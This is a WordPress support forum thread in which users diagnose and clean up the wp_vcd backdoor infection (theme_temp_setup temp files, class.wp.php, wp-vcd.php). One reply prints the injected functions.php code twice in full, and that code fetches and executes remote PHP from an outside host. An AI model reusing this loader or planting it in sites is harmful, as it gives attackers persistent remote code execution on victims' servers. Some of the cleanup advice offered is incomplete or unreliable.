/tmp/theme_temp_setup what is this

pdku
(@pdku)

6 years, 5 months ago

hi , suddenly my wordpress error Parse error: syntax error, unexpected ‘<‘ in /tmp/theme_temp_setupb1fUKP on line 2

i found lots of files in /tmp with filename theme_temp_setupxxxx

and inside those files contained :

<?php
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″/>
<title>www.verna.cc</title>
<meta name=”viewport” content=”width=device-width” />
</head>
<body>
</body>
</html>

am i hacked or ?
i cant find hwo to fix the problem since i dont know where the php files is locate on my vps.

Viewing 15 replies - 1 through 15 (of 17 total)

1 2 →

Thread Starter pdku
(@pdku)

6 years, 5 months ago

ok so i’ve been hacked!
find this in wp-includes with file name class.wp.php <– delete this!

next look into your functions.php remove all on top codes, and problem fixed!

dont forget to change password.

esmi
(@esmi)

6 years, 5 months ago

You need to start working your way through the resources on this page. I’d also suggest reviewing http://ottopress.com/2009/hacked-wordpress-backdoors/

Anything less will probably result in the hacker walking straight back into your site again.

Additional Resources:
Hardening WordPress
http://sitecheck.sucuri.net/scanner/
http://www.unmaskparasites.com/
uri70663
(@uri70663)

6 years, 5 months ago
Hi
I have the same problem.
Can you explain in detail the solve?
@pdku
- This reply was modified 6 years, 5 months ago by uri70663.
benderoffspring
(@benderoffspring)

6 years, 5 months ago

encountered the same, file class.wp.php not. functions.php replaced by new but refuses to work

benderoffspring
(@benderoffspring)

6 years, 5 months ago

The instruction has approached, many thanks!

uri70663
(@uri70663)

6 years, 5 months ago

@benderoffspring I have the same problem.
Can you explain in detail the solve?

benderoffspring
(@benderoffspring)

6 years, 5 months ago

@ Uri70663

wp-include with the file name class.wp.php <- remove it!

file was not. reinstalled functions.php from the original theme and everything started

uri70663
(@uri70663)

6 years, 5 months ago

@benderoffspring thanks
Andrew Nevins
(@anevins)

WCLDN 2018 Contributor | Volunteer support

6 years, 5 months ago
Am I missing something obvious or are you still hacked? Someone or something has broken into your server and created a rogue file. You really need to consider looking at the sources Esmi posted.
- This reply was modified 6 years, 5 months ago by Andrew Nevins.
Hanif Shakil
(@shakiltorj)

6 years, 5 months ago
1. Rename your all theme
2. Login your site
3. Active akismet plugin (free)
4. Install IP2Location Country Blocker — WordPress Plugins and selected -Block all countries except countries listed below.
5. Remove functions.php (all of your theme) top php following code & rename (old name) your theme, active your main theme
————————————————————————–
<?php

if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘[redacted]’))
{
$div_code_name=”wp_vcd”;
switch ($_REQUEST[‘action’])
{

case ‘change_domain’;
if (isset($_REQUEST[‘newdomain’]))
{

if (!empty($_REQUEST[‘newdomain’]))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all(‘/\$tmpcontent = @file_get_contents\(“http:\/\/(.*)\/code4\.php/i’,$file,$matcholddomain))
{

$file = preg_replace(‘/’.$matcholddomain[1][0].’/i’,$_REQUEST[‘newdomain’], $file);
@file_put_contents(__FILE__, $file);
print “true”;
}

}
}
}
break;

default: print “ERROR_WP_ACTION WP_V_CD WP_CD”;
}

die(“”);
}

if ( ! function_exists( ‘theme_temp_setup’ ) ) {
$path=$_SERVER[‘HTTP_HOST’].$_SERVER[REQUEST_URI];
if ( stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) {

if($tmpcontent = @file_get_contents(“http://www.spekt.cc/code4.php?i=”.$path))
{

function theme_temp_setup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), “theme_temp_setup”);
$handle = fopen($tmpfname, “w+”);
fwrite($handle, “<?php\n” . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}

extract(theme_temp_setup($tmpcontent));
}
}
}

?>
———————————————————————
- This reply was modified 6 years, 5 months ago by Andrew Nevins.
Thread Starter pdku
(@pdku)

6 years, 5 months ago

@esmi @anevins yes im reviewing the link @esmi gave , thank you!

and also remove all /tmp files with name theme_temp_setup

@uri70663 @benderoffspring has made the point 😀

Moderator Steven Stern (sterndata)
(@sterndata)

Volunteer Forum Moderator

6 years, 5 months ago

Hey guys, just an etiquette thing. Please don’t @ folks who are already in the thread. If they want to subscribe, they will. If they chose not to, then using the @ sends unwanted emails. Thanks…. and back to having so much un-hacking fun!
helloanimation
(@helloanimation)

6 years, 5 months ago
shakiltorj
Thanks, it’s work for me.
you can say what needs to be done to not repeat this type of attack again?
thanks
- This reply was modified 6 years, 5 months ago by helloanimation.
Hanif Shakil
(@shakiltorj)

6 years, 5 months ago

Some update
a. Rename your all theme
b. Login your site
c. Active akismet plugin (free)
d. Install IP2Location Country Blocker — WordPress Plugins and selected -Block all countries except countries listed below.
e. Go to wp-includes
Delete the following file
1. wp-feed
2. wp-vcd.php
3. class.wp.php
f. Remove functions.php (all of your theme) top php following code & rename (old name) your theme, active your main theme
————————————————————————–
<?php

if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘[redacted]’))
{
$div_code_name=”wp_vcd”;
switch ($_REQUEST[‘action’])
{

case ‘change_domain’;
if (isset($_REQUEST[‘newdomain’]))
{

if (!empty($_REQUEST[‘newdomain’]))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all(‘/\$tmpcontent = @file_get_contents\(“http:\/\/(.*)\/code4\.php/i’,$file,$matcholddomain))
{

$file = preg_replace(‘/’.$matcholddomain[1][0].’/i’,$_REQUEST[‘newdomain’], $file);
@file_put_contents(__FILE__, $file);
print “true”;
}

}
}
}
break;

default: print “ERROR_WP_ACTION WP_V_CD WP_CD”;
}

die(“”);
}

if ( ! function_exists( ‘theme_temp_setup’ ) ) {
$path=$_SERVER[‘HTTP_HOST’].$_SERVER[REQUEST_URI];
if ( stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) {

if($tmpcontent = @file_get_contents(“http://www.spekt.cc/code4.php?i=”.$path))
{

function theme_temp_setup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), “theme_temp_setup”);
$handle = fopen($tmpfname, “w+”);
fwrite($handle, “<?php\n” . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}

extract(theme_temp_setup($tmpcontent));
}
}
}

?>
———————————————————————

thanci35
(@thanci35)

6 years, 5 months ago

I was comprimised with this as well.. Thanks for sharing your resolutions!